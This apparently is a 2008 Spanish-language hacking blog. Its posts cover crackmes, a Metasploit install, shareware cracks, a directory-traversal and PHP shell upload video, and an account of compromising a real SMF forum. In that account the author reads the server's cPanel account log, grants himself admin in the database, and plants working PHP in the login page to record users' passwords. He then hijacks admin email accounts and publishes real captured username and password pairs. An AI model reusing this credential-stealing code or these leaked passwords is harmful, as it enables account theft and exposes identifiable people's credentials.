2/20/2008 - Download The MP3 Direct of mp3tube.net
Hello
This tutorial is for download and obtain in your pc the mp3 direct of the webpage mp3tube.net and you
did not find in the source code the link direct,then look this tutorial in format .pdf
El articulo esta en español sin descargar
The tutorial is in spanish Online
http://www.geocities.com/spriteversus/Atenea/Mp3Tube.pdf |
|
Permanent Link
|
2/20/2008 - Video CGI Directorio Transversal + Upload shell in format php whit command's in parameter | |
EL video trata de ver el directorio transversal....ademas de usar comandos unix para subir una shell y tener un acceso competo graficalmente,la shell es en php...desde un link externo que no interpreta el php en el servidor...entonces tranquilamente se ejecuta en el servidor de la victima
El link de descarga directa del video se encuentra aca
http://www.designerworldgfx.net/atenea/proxy/videos/cgidef.rar |
|
Permanent Link
|
2/20/2008 - Metaspoit Framwork 3.0 in the distribution Atenea Linux installation
Hola
en la pagina oficial de www.metasploit.com estan disponibles 2 versiones de descarga del metasploit framework la version 2 y la version 3...
en la distribucion atenea la version 2 se instala rapido y funciona rapido
la version 3 funciona,pero hay q hacer algunas modificaciones primero,que pasare a explicar...
Primero descargarmos el Metasploit Framework 3.0 para unix
tar zxvf file.tar.gz
cd folder
ya
lo tenemos descomprimidos,si quieren activar el msfconsole or el msfweb
le daran problema por el comando ruby y sus librerias,aca en atenea
debemos instalarlos
ftp://ftp.ruby-lang.org/pub/ruby/ruby-1.8.6.tar.gz "El source" para el command
tar xzvf file.tgz
cd folder
"Recomendacion es q tengas varias terminales abiertas para el manejo"
Descargar http://www.rubygems.org/ "para los modules" y el uso del gem en la terminal
esto es importante ya q la vesion 3 del metasploit usa el .rb y no los modules del perl .pm como en la version 2
tar xzvf file.tar.gz
cd folder
tenemos 3 terminales...
en la ultima terminal estamos en la carpeta y typeamos "ruby setup.rb"
en la segunda terminal typeamos "./configure" despues "make" y despues "make install"
en la primer terminal typeamos msfweb y nos pedira algo y typeamos "gem install -v=1.2.2 rails"
te pedira que pongas Y Or N "pones Y claro"
y despues poines msfweb y ya tenes corriendo el metasploit,vas al navegador como siempre y pones
127.0.0.1:55555
Ready
|
|
Permanent Link
|
2/20/2008 - Bug en Wordpress found in waraxe + video
Hola
Aca hice el video del uso del
exploit en php para wordpress posteado en waraxe,lo hice por el motivo
que habia dudas sobre como usarlo,algunos querian usar el bamcompile
otros subirlo a un host free q soporte php y ejecutarlo desde ahi...
El
video y el uso del exploit lo hice en atenea linux,en esta distro tuve
q descargar el curl y el xampp para el apache....y asi tener el uso del
php en la terminal
En windows se puede hacer tambien,cambian
algunas cosas y ademas tiene mas configuraciones q hacer,hay q
descargar el curl.exe con sus lib para win32 y en el php.ini cambiar
algunas lineas como el curl_php.dll quitarle el ";" y en la ruta de
extension_dir aclarar la ruta del appserv en mi caso y ademas se debe
exportar 2 librerias al system32 y poner una libreria nueva tambien y
el uso es lo mismo,por consola sin necesidad de host free
el video en cuestion es este
http://www.badongo.com/es/file/3570885
El
video fue hecho con el xvidcap con extension .avi por eso el peso del
video es un poco pesado al rededor de 40 Mb pero la ventaja es q con el
propio reproductor de win puedes reproducirlo |
|
Permanent Link
|
2/20/2008 - C0dgin-M3 New
Aca hice otro crackme llamado C0ding-M3 New.... esta mas dificil que el primero....pero igual se puede conseguir crackearlo
la descarga es el cl0sed.rar http://usuarios.lycos.es/ret0deface/c0 Pistas? tienes mas de 2 objetivos para llegar hasta el resultado
|
|
Permanent Link
|
2/20/2008 - AutoRun Cd/Dvd
Hola,este pequeño programa que hice se trata de dar el funcionamiento nuevamente a la lectora & grabadora cuando deja de funcionar el autorun y el cd/dvd no arranca automaticamente
La descarga http://usuarios.lycos.es/ret0deface/c0
|
|
Permanent Link
|
2/20/2008 - C0dingMe
Hola este pequeño Crackme q hize llamado C0dingMe deben conseguirlo
ink de descargar : http://usuarios.lycos.es/ret0deface/c0
Pistas: Es facil...si no te conformas con eso...pide mas pistas,no problem
|
|
Permanent Link
|
2/20/2008 - Six's Software Shareware & Six's Patch
Esta pagina da 6 programas utiles programados en Visual Basic.... que debes pagar si te gustan....lo que hize fue probar con uno y al poder saltar la proteccion,probe con los demas y tenian la misma proteccion,asi que el siguiente paso fue hacerme los 6 Patch's
Los 6 Patch's estan aca
http://usuarios.lycos.es/ret0deface/patch
|
|
Permanent Link
|
2/20/2008 - Video De compilacion de ASM con el TASM
Bueno he visto por ahi muchas preguntas de volver un .exe a partir de
un Code en ASM...en este caso el video se usa el TASM para aplicaciones
de 16 Bits ms-dos sin uso de macros para 32 bits
Aca el video online
http://usuarios.lycos.es/ret0deface/tasm/tasm.html
|
|
Permanent Link
|
2/20/2008 - Keylogger In SMF
Hola repetire la historia nuevamente
Comentare que le paso al foro www.fusionwarez.org
EL foro estaba alojado en un servidor dns.movile unix,yo tenia una shell ahi que un amigo me paso....quizas muchos se harian root y le darian el deface a todas las webs hospedadas ahi....
pero aca el proposito fue otro,cuando me di cuenta q el servidor daba comodidad de cpanel,empeze a buscar todas las cuentas...
cat /var/cpanel/accounting.log
Entre todas las cuentas hospedadas vi el foro en cuestion...
Al entrar a la carpeta tenia permisos en el index del foro y en el settings se podria haber hecho el deface tranquilamente...pero aca viene lo distinto...
Cuando vi la entrada del foro vi el login si o si debias registrarte para navegar por el foro y ver los post,no podias estar como invitado...
Entonces primero me fui a la DB y en la tabla smf_members busque mi nickname para darme permisos de administrador en el ID_GROUP me puse un "1" y entre al foro y me hize el backup para tener los email ocultos y los nombres ocultos rapidamente...
Despues de obtener el Backup volvi al ID_GROUP "0" y me quede como un usuario normal
entonces al tener permisos en el index modifique el index pero no para un "deface" sino para troyanizar el login teoricamente.... lo que puse fue el siguiente code...
Abajo del time_start
if((isset($_POST['passwrd'])) && (isset($_POST['user']))) {
$passwrd = $_POST['passwrd'];
$users = $_POST['user'];
$crea = fopen("Packages/instaled.txt","a");
fwrite($crea, "$users|$passwrd|
");
fclose($crea); }
Despues de 3 dias de dejar el index asi...habia obtenido varias claves con sus users en la carpeta Packages y en el archivo de texto instaled...solo podian darse cuenta si entraban al servidor,al cpanel o al ftp...
Despues de obtener todos los datos habia una seccion en el foro llamada ing social que me intereso y quize probar eso... Los administradores cometieron un error que cometen muchos, "usar la misma clave para un foro y para un correo" entonces entre al correo de los administradores ,los cambie por un cierto tiempo para tener tiempo de usarlas....la verdad que ser administrador tiene sus ventajas...me confesaban sus claves o aceptabana cualquier archivo, ejemplo "un server" donde esas personas tenian otras webs como admin y asi se hizo una escala de ing social,como a karlit0z....
Despues de esta travesura se le devolvio la cuenta a los administradores incluyendo a hebergonz que de nick era speedmaster y se le devolvio la cuenta al admin Duck...
Algunas contraseñas capturadas fueron esta
kento|terminador|
doctorsergio5|6189268|
DUCK|471521|
dagil|pa28101987to|
msiemon|churango|
..::D4n13L::..|20031987|
Angel|260489|
manuelito|2485351|
Anmy|0312123|
hadesmarc|maoc12345|
hebergonz|vilmapacheco|
hebergonz|vilmapacheco.87|
msiemon|churango| |
|
Permanent Link
|
|
About Me
Tutoriales - Hacking - Personal
Friends
|
